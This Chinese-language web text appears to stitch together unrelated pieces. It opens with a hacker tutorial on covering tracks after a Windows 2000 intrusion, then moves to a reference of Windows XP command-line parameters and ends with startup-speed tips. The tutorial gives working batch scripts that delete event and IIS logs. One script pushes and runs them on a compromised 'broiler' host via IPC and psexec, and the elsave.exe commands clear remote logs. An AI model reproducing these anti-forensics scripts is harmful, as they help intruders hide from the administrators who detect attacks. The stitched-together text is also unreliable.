什么是日志文件？它是一些文件系统集合，依靠建立起的各种数据的日志文件而存在。在任何系统发生崩溃或需要重新启动时，数据就遵从日志文件中的信息 记录原封不动进行恢复。日志对于系统安全的作用是显而易见的，无论是网络管理员还是 黑客都非常重视日志，一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能，而一个聪明的黑客会在入侵成功后迅速清除掉对自己不利的日志。无论是 攻还是防，日志的重要性由此可见。下面我们就来简单讨论一下日志文件的清除方法。

一、日志文件的位置

windows 2000的系统日志文件有应用程序日志，安全日志、系统日志、DNS服务器日志等等，应用程序日志、安全日志、系统日志、DNS日志默认位置：%systemroot%system32config。

安全日志文件：%systemroot%system32configSecEvent.EVT

系统日志文件：%systemroot%system32configSysEvent.EVT

应用程序日志文件：%systemroot%system32configAppEvent.EVT

有的管理员很可能将这些日志重定位（所以日志可能不在上面那些位置），其中EVENTLOG下面有很多的子表，在里面可查到以上日志的定位目录。

二、清除自己电脑中的日志

如果你要清除自己电脑中的日志，可以用管理员的身份来登录Windows，然后在“控制面板”中进入“管理工具”，再双击里面的“事件查看 器”。打开后我们就可以在这里清除日志文件了，里面有应用程序、安全和系统日志文件。举个例子，比方说你想清除安全日志，可以右键点击“安全日志”，在弹 出的菜单中选择“属性”。接下来在弹出的对话框中，点击下面“清除日志”按钮就可以清除了，如果你想以后再来清除这些日志的话，可以将“按需要改写尺 寸”，这样就可以在达到最大日志尺寸时进行改写事件了，不会提示你清除日志。

三、清除远程主机上的日志

大多数情况下，IIS的日志会忠实地记录它接收到的任何请求（也有特殊的不被IIS记录的攻击），一个优秀的系统管理员会利用这点来发现入 侵的企图，保护自己的系统。所以如果你是黑客，入侵系统成功后第一件事便是清除日志，擦去自己的形迹，这时可以用以下两个办法：一是自己编写批处理文件来 解决，编写一个能清除日志的批处理非常简单，方法是：新建一个具有如下内容的批处理文件：

　　@del c:winntsystem32logfiles*.*

　　@del c:winntsystem32config*.evt

　　@del c:winntsystem32dtclog*.*

　　@del c:winntsystem32*.log

　　@del c:winntsystem32*.txt

　　@del c:winnt*.txt

　　@del c:winnt*.log

　　@del c:del.bat

把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令，在它的前面加上“@”前缀字符，表示执行时本行在命令行或DOS里面不显示，另外del命令大家一定清楚吧？它是删除文件命令。

接下来再新建一个批处理文件，内容如下：

　　@copy del.bat \%1c$

　　@echo 向肉鸡复制本机的del.bat……OK

　　@psexec \%1 c:del.bat

　　@echo 在肉鸡上运行del.bat，清除日志文件……OK

保存为clean.bat即可，假设已经与肉鸡进行了IPC连接，然后在CMD下输入：clean.bat 肉鸡IP，即可清除肉鸡上的日志文件。

清除日志的另外一个方法是借助第三方软件，如著名黑客软件流光的开发者黑客小榕的elsave.exe，就是是一款可以远程清除系统日志、 应用程序日志、安全日志的软件，大家可以在网上下载到。elsave.exe使用起来很简单，首先利用获得的管理员账号与对方建立IPC会话：net use \ip pass /user: user，然后在命令行下执行如下命令：elsave -s \ip -l application -C，这样就删除了安全日志。

命令：DIR，列文件、目录

增加参数：/-C
参数说明：DIR列文件、目录时显示的文件大小，其数值以千为单位进行分隔，使用此参数即“DIR/-C”将取消显示中的分隔符，以满足部分人的视觉习惯。

增加参数：/Q
参数说明：Windows是多用户操作系统，使用此参数即“DIR /Q”列文件、目录时，将显示出文件、目录的用户属性。

增加参数：/T:C、/T:A、/T:W
参数说明：使用此参数即“DIR/T:C”、“DIR/T:A”、“DIR/T:W”分别显示文件、目录的创建时间、上次访问时间和上次修改时间。

增加参数：/X
参数说明：使用此参数即“DIR/X”列文件、目录时，会对长文件名同时显示“8.3”格式的文件名。

命令：CD，改变目录

增加参数：/D
参数说明：此参数的作用是快速改变当前目录，比如当前目录是C:\Windows，使用命令“CD/D E:\Tools”可快速切换到E:\Tools目录下。注：只有在Win XP的“运行”文本框中输入“CMD”得到的DOS窗口中才能使用此参数。

命令：MD，建立目录

功能说明：此命令并未增加参数，但是增强了功能，它可一次建立多级子目录， 例如使用命令“MD AA\BB\CC\DD”将一次性创建AA、BB、CC、DD四级子目录。而在老版本的DOS中，若不存在AA子目录，便无法直接建立AA下的BB等深层子目录。

命令：RD，删除目录

增加参数：/S
参数说明：使用此参数即“RD/S”用于删除目录树，即删除目录及目录下的所有子目录和文件，相当于以前版本中的DELTREE命令。

增加参数：/Q
参数说明：使用上面的/S参数删除目录树时，系统会要求用户确认是否真的要删除。若同时使用/Q参数即“RD/S /Q”，在进行删除操作时将取消确认，相当于DELTREE命令的/Y参数。

命令：DEL，删除文件或目录

增加参数：/F
参数说明：使用此参数即“DEL/F”可删除只读文件。

增加参数：/S、/Q
参数说明：使用此参数即“DEL/S”作用与“RD/S”完全相同，即删除目录及目录下的所有子目录和文件。同时使用参数/Q，可取消删除操作时的系统确认。

增加参数：/A
参 数说明：删除指定属性或指定属性以外的文件，/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、 /A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件。

命令：ATTRIB，更改文件或目录的属性

增加参数：/D
参 数说明：在Win XP中我们不能把文件或文件夹设置为系统属性，只能设为只读、隐藏或存档属性。而带参数/D使用ATTRIB命令可以对文件的所有属性进行设定，设定时必 须与参数/S同时使用。例如“ATTRIB /S /D +S D:\Study”，作用是将D:\Study文件夹设置为系统文件夹。

命令：Format，格式化磁盘

增加参数：/FS:filessystem
参数说明：按指定文件系统类型（FAT、FAT32、NTFS）格式化磁盘，例如“Format /FS:NTFS”。

命令：DATE、TIME，显示系统日期和时间

增加参数：/T
参数说明：使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间

Win2000/XP应用之奇技酷招

每个Windows用户都希望Windows的启动速度越快越好，不过，如果你想让Windows启动速度更快些，还要掌握一些加速Windows启动的独门秘技！

1．不容忽视的磁盘IDE通道

Windows XP中有一个非常影响启动速度的设置，那就是磁盘IDE通道。一般来说，Windows XP用户不需要安装主板的IDE驱动或补丁程序，ULTRA DMA功能就已经打开了。也正因为如此，绝大多数用户会让IDE通道处于自动状态，但这会导致Windows XP启动变慢——因为主板可以连接四个IDE设备，但大多数电脑只有两个IDE设备，即硬盘和光驱。少数人可能有单硬盘、双光驱(DVD和刻录机)或双硬 盘、单光驱，即便这样也只有三个IDE设备，所以一般都有1~2个IDE通道处于空闲状态。此时，你应该把并不存在的IDE设备设置为“无”，而不是“自 动检测”。

提示：设置IDE通道的方法是：单击“开始→控制面板”，双击“系统”，切换到“硬件”选项卡，单击“设备管理器”，再双击 “IDE ATA/ATAPI控制器”。双击下面的“主要IDE通道”或“次要IDE通道”。我们可以看到，“设备0”下面的“设备类型”不可选，表明该IDE通道 目前已被使用。“设备1”下面的“设备类型”可选，如果你近期内不再添加新的IDE设备，可以将“设备类型”设置为“无”。

2．禁用服务和启用Power User

Windows 2000/XP的启动速度要比Windows 9x/Me慢，众多的服务是重要因素之一，因此普通用户禁用一些无用的服务，对启动速度也有很大帮助：

alerter (用户不在局域网并且不需要管理警报)

clipbook (用户不需要查看远程剪贴簿的剪贴页面)

distributed link tracking client (用户不使用NTFS分区并且没有连入局域网)

distributed transaction coordinator (不需要同时处理多个数据库或文件系统)

fax service (不需要发送或接收传真)

ftp publishing service(你的电脑不做为FTP服务器使用)

iis admin service (你的电脑不做为Web服务器使用)

另外，建议大家创建一个Power User用户，平时用它来登录Windows 2000/XP，因为相比管理员身份，它启动的服务更少同时也更加安全。

3．及时清理日志文件

Windows 2000/XP的日志文件比较容易被用户忽视。其实当我们每次开关机、运行程序、系统报错时，这些信息都会被记录下来，保存在日志文件中。但日志文件会随着时间的增长越来越大，从而影响了系统启动速度。我们可以自己指定日志文件的大小及处理方式：

进 入“开始→设置→控制面板→管理工具”，双击“事件查看器”或是单击“开始→运行”，输入“eventvwr.msc”后回车，即可打开“事件查看器”， 在右侧窗口中可看到应用程序日志、安全日志和系统日志。在任意一种日志上面右击并选择“属性”，就可以在如图所示的对话框中为日志文件设定最大值，还可以 选择当日志满了以后的处理方式——一般来说让它自动覆盖一段时间以前的旧日志，这样日志文件就永远不会超出指定大小。单击“筛选器”选项卡可以指定需要写 入日志文件的事件类型。


设置“系统日志”的属性

4．借花献佛加快Windows 2000 启动

Windows XP相比Windows 2000在很多方面进行了优化改进，因而启动速度更快，那么能不能让Windows 2000也可以享受这样的好处呢？其实，只要找到Windows XP相应语言版本文件，然后替换Windows 2000的相应文件即可。这两个文件为NTLDR、NTDETECT.COM，它们都在系统分区的根目录下。当然，为了防止Windows 2000出错，建议用户在替换这两个文件前备份Windows 2000原有的同名文件。

5．让蓝色滚动条只滚动一圈

这 是一个适用于Windows XP的秘技。打开“注册表编辑器”，依次展开[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager\Memory Management\PrefetchParameters]分支，然后双击右侧窗口中的DWORD值“EnablePrefetcher”，将其值由 “3” 改为“1”。退出注册表编辑器并重启电脑，你会发现进入Windows XP时蓝色滚动条的滚动时间明显减少了！